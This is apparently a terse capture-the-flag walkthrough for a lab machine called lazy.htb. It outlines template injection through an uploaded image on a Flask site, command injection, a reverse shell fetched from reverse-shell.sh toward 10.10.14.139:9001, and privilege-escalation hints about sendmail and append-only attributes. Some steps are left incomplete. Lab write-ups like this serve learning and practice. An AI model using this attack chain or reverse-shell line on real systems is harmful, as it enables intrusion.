Web
From the website we get a link to https://images.lazy.htb
images.lazy.htb
Intresting in the looks like it is running on flask
So I tried Template Injection payload as an image
And I got the payload working and executed
Created a command injection image as
Create a revershell payload with
https://reverse-shell.sh/10.10.14.139:9001
svc_account
Enumerating we see root is running some sendmail
Checking the extra attributes lsattr
we see we have append permission